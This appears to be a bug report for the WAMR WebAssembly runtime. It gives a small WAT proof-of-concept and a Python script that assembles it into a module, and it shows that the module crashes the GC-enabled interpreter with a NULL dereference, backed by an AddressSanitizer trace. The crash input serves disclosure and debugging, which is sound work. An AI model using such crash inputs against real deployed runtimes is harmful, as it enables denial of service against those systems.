Describe the bug
The attached wasm module allocates GC objects continuously in an infinite loop (every `ref.func` creates a new function object on the GC heap). When the module is run in interpreter mode, the collector is triggered by the allocation pressure and the runtime crashes with a NULL dereference in `wasm_runtime_traverse_gc_rootset`.
Version
Version: 2.4.3
Commit: 4b306f0
To Reproduce
Steps to reproduce the behavior:
- Build iwasm with the following features:

```shell
-DWAMR_BUILD_INTERP=1 -DWAMR_BUILD_AOT=0 -DWAMR_BUILD_JIT=0 -DWAMR_BUILD_FAST_JIT=0 -DWAMR_BUILD_FAST_INTERP=1 -DWAMR_BUILD_BULK_MEMORY=1 -DWAMR_BUILD_SIMD=1 -DWAMR_BUILD_REF_TYPES=1 -DWAMR_BUILD_EXTENDED_CONST_EXPR=1 -DWAMR_BUILD_MEMORY64=0 -DWAMR_BUILD_MULTI_MEMORY=0 -DWAMR_BUILD_TAIL_CALL=1 -DWAMR_BUILD_SHARED_MEMORY=1 -DWAMR_BUILD_GC=1 -DWAMR_BUILD_EXCE_HANDLING=0 -DWAMR_BUILD_LIB_PTHREAD=1 -DWAMR_BUILD_LIB_WASI_THREADS=1
```
- PoC (WAT; convert it to `poc.wasm`). The loop leaves one funcref on the stack per iteration and branches back unconditionally, so it never terminates:

```wat
(module
  (export "main" (func $main))
  (func $main
    block
      loop
        ref.func 0
        br 0
      end
    end
  )
)
```
- Run in classic/fast interpreter mode:

```shell
iwasm --interp -f main poc.wasm
```
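To reproduce without a `wat2wasm` install, the PoC above can be assembled by hand. The following is an added example, not part of the original report or of the WAMR project; it assumes only the WebAssembly binary encoding (magic, version, type/function/export/code sections, and the opcodes `block`, `loop`, `ref.func`, `br`, `end`) and writes the resulting 44-byte module to `poc.wasm`. The output file name and the `build_poc`/`sections` helper names are my own choices.

```python
# Added example (not part of the original report): hand-assemble the PoC
# module from the WAT above into poc.wasm, so the crash can be reproduced
# without a wat2wasm install. Only the WebAssembly binary encoding is
# assumed; every byte below maps to one construct in the PoC.


def uleb128(n: int) -> bytes:
    """Encode a non-negative integer as unsigned LEB128."""
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def read_uleb128(buf: bytes, pos: int) -> tuple[int, int]:
    """Decode an unsigned LEB128 at buf[pos]; return (value, next_pos)."""
    result, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            return result, pos


def vec(items: list[bytes]) -> bytes:
    """A wasm vector: item count followed by the concatenated items."""
    return uleb128(len(items)) + b"".join(items)


def section(section_id: int, payload: bytes) -> bytes:
    """A wasm section: id byte, payload size, payload."""
    return bytes([section_id]) + uleb128(len(payload)) + payload


# Opcodes used by the PoC body.
OP_BLOCK, OP_LOOP, OP_END, OP_BR, OP_REF_FUNC = 0x02, 0x03, 0x0B, 0x0C, 0xD2
BLOCKTYPE_EMPTY = 0x40  # block/loop with no parameters and no results


def build_poc() -> bytes:
    """Return the PoC module: one exported func that runs `ref.func 0` forever."""
    # Type 0: () -> ()
    type_sec = section(1, vec([b"\x60" + vec([]) + vec([])]))
    # Function 0 uses type 0.
    func_sec = section(3, vec([uleb128(0)]))
    # Exporting func 0 as "main" also makes `ref.func 0` valid: a function
    # referenced by ref.func must be declared elsewhere in the module.
    export_sec = section(
        7, vec([uleb128(len(b"main")) + b"main" + b"\x00" + uleb128(0)])
    )
    body = (
        vec([])  # no locals
        + bytes([OP_BLOCK, BLOCKTYPE_EMPTY])
        + bytes([OP_LOOP, BLOCKTYPE_EMPTY])
        + bytes([OP_REF_FUNC]) + uleb128(0)  # allocates a func object each iteration
        + bytes([OP_BR]) + uleb128(0)        # back-edge to the loop: never exits
        + bytes([OP_END, OP_END, OP_END])    # closes loop, block, function
    )
    code_sec = section(10, vec([uleb128(len(body)) + body]))
    return b"\x00asm" + b"\x01\x00\x00\x00" + type_sec + func_sec + export_sec + code_sec


def sections(wasm: bytes) -> list[tuple[int, bytes]]:
    """Walk the module and return (section id, payload) pairs as a layout check."""
    if wasm[:8] != b"\x00asm\x01\x00\x00\x00":
        raise ValueError("not a wasm v1 module")
    pos, out = 8, []
    while pos < len(wasm):
        sid = wasm[pos]
        size, pos = read_uleb128(wasm, pos + 1)
        out.append((sid, wasm[pos:pos + size]))
        pos += size
    if pos != len(wasm):
        raise ValueError("truncated section at end of module")
    return out


if __name__ == "__main__":
    module = build_poc()
    with open("poc.wasm", "wb") as fh:
        fh.write(module)
    print(f"wrote poc.wasm ({len(module)} bytes), section ids:",
          [sid for sid, _ in sections(module)])
```

Running the script writes `poc.wasm` into the current directory; the report's `iwasm --interp -f main poc.wasm` then runs it. The `sections` walker is only a sanity check that the hand-built module decodes into the expected type, function, export and code sections before it is handed to the runtime.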
Actual Result
```text
AddressSanitizer:DEADLYSIGNAL
=================================================================
==385372==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x555555662a1f bp 0x7fffffff17b0 sp 0x7fffffff17b0 T0)
==385372==The signal is caused by a READ memory access.
==385372==Hint: address points to the zero page.
    #0 0x555555662a1f in wasm_runtime_traverse_gc_rootset wasm-micro-runtime/core/iwasm/common/gc/gc_common.c:940
    #1 0x55555572f9a5 in reclaim_instance_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_gc.c:309
    #2 0x55555572f9a5 in gci_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_gc.c:465
    #3 0x55555572df7f in do_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:495
    #4 0x55555572df7f in do_gc_heap wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:485
    #5 0x55555572df7f in alloc_hmu_ex wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:538
    #6 0x55555572e24c in gc_alloc_wo wasm-micro-runtime/core/shared/mem-alloc/ems/ems_alloc.c:784
    #7 0x555555663e7f in gc_obj_malloc wasm-micro-runtime/core/iwasm/common/gc/gc_object.c:54
    #8 0x555555663e7f in wasm_func_obj_new_internal wasm-micro-runtime/core/iwasm/common/gc/gc_object.c:392
    #9 0x55555565940d in wasm_create_func_obj wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:2159
    #10 0x55555569923e in wasm_interp_call_func_bytecode wasm-micro-runtime/core/iwasm/interpreter/wasm_interp_fast.c:2031
    #11 0x5555556d9bc4 in wasm_interp_call_wasm wasm-micro-runtime/core/iwasm/interpreter/wasm_interp_fast.c:7990
    #12 0x555555658250 in call_wasm_with_hw_bound_check wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:3638
    #13 0x55555565a88b in wasm_call_function wasm-micro-runtime/core/iwasm/interpreter/wasm_runtime.c:3710
    #14 0x55555564e3c5 in execute_func wasm-micro-runtime/core/iwasm/common/wasm_application.c:685
    #15 0x55555564e3c5 in wasm_application_execute_func wasm-micro-runtime/core/iwasm/common/wasm_application.c:917
    #16 0x555555577742 in app_instance_func wasm-micro-runtime/product-mini/platforms/linux/../posix/main.c:137
    #17 0x555555577742 in main wasm-micro-runtime/product-mini/platforms/linux/../posix/main.c:1050
    #18 0x7ffff7c29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #19 0x7ffff7c29e3f in __libc_start_main_impl ../csu/libc-start.c:392
    #20 0x555555579074 in _start (wasm-micro-runtime/product-mini/platforms/linux/build/iwasm-2.4.3+0x25074)
```
Desktop:
- Arch: x86_64
- OS: Linux
- Version: Ubuntu 22.04